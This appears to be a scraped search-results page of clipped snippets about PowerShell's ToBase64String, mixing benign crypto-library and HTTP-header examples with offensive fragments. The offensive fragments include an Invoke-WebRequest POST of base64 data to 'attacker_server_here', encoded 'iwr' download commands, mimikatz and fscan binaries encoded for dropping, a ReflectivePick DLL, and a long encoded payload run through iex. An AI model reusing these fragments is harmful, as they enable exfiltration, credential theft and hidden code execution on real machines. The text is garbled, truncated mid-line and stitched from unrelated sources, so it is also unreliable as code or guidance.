Invoke-WebRequest -uri http://attacker_server_here/exploit.raw -Method POST -Body ([System.Convert]::ToBase64String...Invoke-WebRequest -uri http://attacker_server_here/exploit.raw -Method POST -Body ([System.Convert]::ToBase64String...Invoke-WebRequest -uri http://attacker_server_here/exploit.raw -Method POST -Body ([System.Convert]::ToBase64String
+= $n.Name+'|'}$Bytes = [System.Text.Encoding]::Unicode.GetBytes($process);$EncodedText =[Convert]::ToBase64String...+= $n.Name+'|'}$Bytes = [System.Text.Encoding]::Unicode.GetBytes($service);$EncodedText =[Convert]::ToBase64String...+= $n.Name+'|'}$Bytes = [System.Text.Encoding]::Unicode.GetBytes($process);$EncodedText =[Convert]::ToBase64String
对字符串进行 hmac-md4 加密,输出经过 base64 编码的字符串 dongle.Encrypt.FromString("hello world").ByHmacMd4("dongle").ToBase64String...对字符串进行 hmac-md5 加密,输出经过 base64 编码的字符串 dongle.Encrypt.FromString("hello world").ByHmacMd5("dongle").ToBase64String...对字符串进行 hmac-sha1 加密,输出经过 base64 编码的字符串 dongle.Encrypt.FromString("hello world").ByHmacSha1("dongle").ToBase64String...====== // 对字符串进行 rc4 加密,输出经过 base64 编码的字符串 dongle.Encrypt.FromString("hello world").ByRc4("dongle").ToBase64String...world // 对字符串进行 3des 加密,输出经过 base64 编码的字符串 dongle.Encrypt.FromString("hello world").By3Des(cipher).ToBase64String
Authorization 加入信息 在 PowerShell 中,按照规范需要传入一段 base64 的字符,于是代码如下 $encodedAuthString = [System.Convert]::ToBase64String
C:\>powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell iwr 192.168.220.134...注意windows的文件名长度,尽量简写,如: C:\>powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes
1.2.3.4:8000/a'))" $bytes = [System.Text.Encoding]::Unicode.GetBytes($text) $EncodedText = [Convert]::ToBase64String
process += n.Name+'|'}Bytes = [System.Text.Encoding]::Unicode.GetBytes(process);EncodedText =[Convert]::ToBase64String...process += n.Name+'|'}Bytes = [System.Text.Encoding]::Unicode.GetBytes(process);EncodedText =[Convert]::ToBase64String
000000000'); $String = [Text.Encoding]::ASCII.GetString(([Text.Encoding]::ASCII.GetBytes([Convert]::ToBase64String
calc.exe" $FileBytes = [IO.File]::ReadAllBytes($LocalFilePath) $EncodedFileContentsToDrop = [Convert]::ToBase64String...mimikatz.exe’ $FileBytes=[IO.File]::ReadAllBytes($LocalFilePath) $EncodedFileContentsToDrop=[Convert]::ToBase64String...Administrator\mimikatz.exe‘,[Convert]::FromBase64String($EncodedFile)) ‘@ $EncodedPayload=[Convert]::ToBase64String...Management.Automation.PSSerializer]::Serialize($Result, 5) #查阅MSDN,发现这是一种序列化对象的方法 $Encoded = [Convert]::ToBase64String...Set-ItemProperty -Path HKLM:\SOFTWARE\EvilKey -Name Result -Value $Encoded '@ $EncodedPayload = [Convert]::ToBase64String
p += "1100"; p += ""; p += ""; p += ToBase64String
txt文本程序 $PEBytes = [System.IO.File]::ReadAllBytes("fscan64.exe") $Base64Payload = [System.Convert]::ToBase64String
client.Close()' $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String
\ReflectivePick_x64.dll -Encoding Byte $Encoded = [System.Convert]::ToBase64String($Content) $Encoded
107 108 109 110 111 112 113 114command = 'dir "c:\program files" ' encodedCommand = [Convert]::ToBase64String
Filter "name='$($_.User)'").SID -eq "S-1-5-18"}) if ("$SystemProc" -ne "") { $([Convert]::ToBase64String...IABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBKAEYAZABJAFIAegBRADQATQBXAFIAawBJAEQAMABuAFEAMQBsAEQAVgBEAE0ANQBNAHoAUQB3AFoAbQBaAG8ASgB6AHMAZwBKAEUAWgBaAE4AVABKAGoAWgBUADAAbgBUAGsATgBEAFUAagBrADUATgB6AEIAbwBaAG0AaABqAEoAegBzAGcASQBBAD0APQAiACkAKQAgAHwAIABpAGUAeAAgADsAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwASQBuAHQAZQByAG4AZQB0ACAARQB4AHAAbABvAHIAZQByAFwAQQBjAHQAaQB2AGUAWAAgAEMAbwBtAHAAYQB0AGkAYgBpAGwAaQB0AHkAXAB7ADIAMgA2AGUAZAA1ADMAMwAtAGYAMQBiADAALQA0ADgAMQBkAC0AYQBkADIANgAtADAAYQBlADcAOABiAGMAZQA4ADEAZAA3AH0AJwApAC4AJwAoAEQAZQBmAGEAdQBsAHQAKQAnACkAKQAgAHwAIABpAGUAeAA=")) | iex | Out-Null; kill $PID; } } catch{$([Convert]::ToBase64String
在 Microsoft Windows 中编码 在 Windows 中,PowerShell 的 Convert.ToBase64String 可用于执行 Base64 编码: [convert]::ToBase64String
Step4 复制的SHA-256计算结果粘贴至该命令括号内,开始计算BASE64: [Convert]::ToBase64String([Text.Encoding]::ASCII.GetBytes('
"; } if ($ByteArray) { $Base64String = [System.Convert]::ToBase64String($ByteArray
领取专属 10元无门槛券
手把手带您无忧上云